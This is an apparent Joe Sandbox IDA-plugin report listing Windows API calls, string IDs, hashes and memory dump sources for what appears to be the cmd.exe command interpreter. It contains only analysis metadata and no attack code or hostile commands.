                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 000208D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 000208F3
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 0002090B
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcstol$Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2343214347-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 947c6def3c04ff49f5068ea7bd949f82a71dda1f68fa5fee8622122b2556182c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e1843617c676d0f90ab3a7394299e8d7955e4bc7fb8e067c8c45f23c3ecf4029
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 947c6def3c04ff49f5068ea7bd949f82a71dda1f68fa5fee8622122b2556182c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22A1D274A003258FEB24DFA4E8849BEB7F6EF45304B14402EE946DB352EB759C81CB95
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • _pipe.MSVCRT ref: 00016B4F
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00016BF7
                                                                                                                                                                                                                                                                                                                                                                                                                          • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00016C05
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E950: memset.MSVCRT ref: 0001E9A0
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E950: wcschr.MSVCRT ref: 0001E9FC
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E950: wcschr.MSVCRT ref: 0001EA14
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E950: _wcsicmp.MSVCRT ref: 0001EA80
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00016D8F
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A30,00000001), ref: 0002A6D8
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A1A8: _dup.MSVCRT ref: 0001A1AF
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A1D6: _dup2.MSVCRT ref: 0001A1EA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A16C: _close.MSVCRT ref: 0001A19B
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1441200171-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 62d9dc50517790cb8247699746aa90670f6e0c1e982f6197a55b5439ebb8dfe4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5d2110bae1e32b52d7ad5c269f28a0160af9bdb1a0355c51dd46897d2da2b777
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62d9dc50517790cb8247699746aa90670f6e0c1e982f6197a55b5439ebb8dfe4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4691A3757007119FDB24EF24EC86AAA73E1EB8A320F14492EE45AD7292DF35DC81CB45
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00026C76,00011000), ref: 00026B47
                                                                                                                                                                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00026C76,?,00026C76,00011000), ref: 00026B50
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00026C76,00011000), ref: 00026B5B
                                                                                                                                                                                                                                                                                                                                                                                                                          • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00026C76,00011000), ref: 00026B62
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3231755760-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ef1c464606ce296e425b6fa883cac455a23f1b0978f8503033b6499a7132fc86
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2c588a077fefa3390eb13d3a2b1d411f4a024e0650b234c2026cb057115f8277
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef1c464606ce296e425b6fa883cac455a23f1b0978f8503033b6499a7132fc86
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7ED0C972240305ABEB002BE5EC0DA4A3F28EB46353F004100F30DC2061CA3E44018B67
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,0003C9D0,00000108,00022107,?,00000000,00000000,00000000), ref: 000194AA
                                                                                                                                                                                                                                                                                                                                                                                                                          • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 000194D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 000194F1
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0001954A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 0001955D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021D90: _wcsnicmp.MSVCRT ref: 00021E14
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 000195B8
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00019602
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00019624
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0002BDF1
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0002BE0D
                                                                                                                                                                                                                                                                                                                                                                                                                          • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 0002BE26
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributeProcThread$ErrorLastListmemset$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_wcsnicmplstrcmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1449572041-3461277227
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a87a2b3e097c15c550e0740646047c33b8b818c03717a1a2b27f9981277d5ba5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f6b1406babd7ab950e4b249626a42d9306312264f0a30951a59db6ae39ffe48d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a87a2b3e097c15c550e0740646047c33b8b818c03717a1a2b27f9981277d5ba5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EC1A174A043259FEB649B64DC55BEE77B8EF46304F0040AAE60AD7181EB748DC0CF62
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00014781
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 000147E4
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 000147EC
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 000147FD
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00014805
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A16C: _close.MSVCRT ref: 0001A19B
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00014832
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 0001483A
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00014871
                                                                                                                                                                                                                                                                                                                                                                                                                          • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000001), ref: 00028120
                                                                                                                                                                                                                                                                                                                                                                                                                          • memmove.MSVCRT(?,?,?), ref: 00028191
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,?,00000000), ref: 00028328
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0002832F
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: _get_osfhandle.MSVCRT ref: 0001DDA3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0002C050), ref: 0001DDAD
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File_get_osfhandle$memset$ConsoleHandlePathPointerReadSearchSizeTypeWrite_closememmove
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DPATH
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Similarity
• API ID: _wcsicmp$iswspace
• String ID: =,;$FOR$FOR/?$IF/?$REM$REM/?
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Similarity
• API ID: iswdigit$iswspacewcschr$_setjmp3
• String ID: ()|&=,;"$=,;$@$Ungetting: '%s'
APIs
• GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0003E590,00002000,?,00058BF0,00000000,?,?,00018F0D), ref: 0001EC51
• _wcsicmp.MSVCRT ref: 0001EC77
• _wcsicmp.MSVCRT ref: 0001EC8D
• _wcsicmp.MSVCRT ref: 0001ECA3
• _wcsicmp.MSVCRT ref: 0001ECB9
• _wcsicmp.MSVCRT ref: 0001ECCF
• _wcsicmp.MSVCRT ref: 0001ECE5
• _wcsicmp.MSVCRT ref: 0001ECF7
• _wcsicmp.MSVCRT ref: 0001ED0D
  • Part of subcall function 00019310: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0003E590,?,00002000), ref: 00019342
  • Part of subcall function 00019310: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00019356
  • Part of subcall function 00019310: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 0001936A
  • Part of subcall function 00019310: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 0001937E
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Similarity
• API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
• String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 00039CC8
                                                                                                                                                                                                                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,?), ref: 00039D22
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00039D2A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00039D3A
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00039D50
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00039D58
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00039D68
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00039D7C
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00039DDB
                                                                                                                                                                                                                                                                                                                                                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00039DE2
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 00039DF2
                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT ref: 00039E13
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A16C: _close.MSVCRT ref: 0001A19B
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00039E6A
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00039E9B
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00039EA9
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: _get_osfhandle.MSVCRT ref: 0001DDA3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0002C050), ref: 0001DDAD
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: <noalias>$CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2015057810-1690691951
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ddfd4a0f11c34505abcd57912bb9e175e727858352d7aac667bd829ed18df2b7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: aa51caad104660a4c8745d8d814a698c37aee412ba5141839ab33bf2981c63f3
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ddfd4a0f11c34505abcd57912bb9e175e727858352d7aac667bd829ed18df2b7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04811672A002149BDF16DBB4EC45AEEBBFDAF46710F140129F802E7290EBB59D41CB65
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: _get_osfhandle.MSVCRT ref: 00019A1C
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0001793A,00000104,?), ref: 00019A2B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00019A47
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374), ref: 00019A56
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374), ref: 00019A61
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00019A6A
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00017943
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00017951
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00050AF0,000000A0,00000000,00000000,00000000,?,00000104,?), ref: 000179BE
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,00000104,?), ref: 00017A1C
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00017A27
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2173784998-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
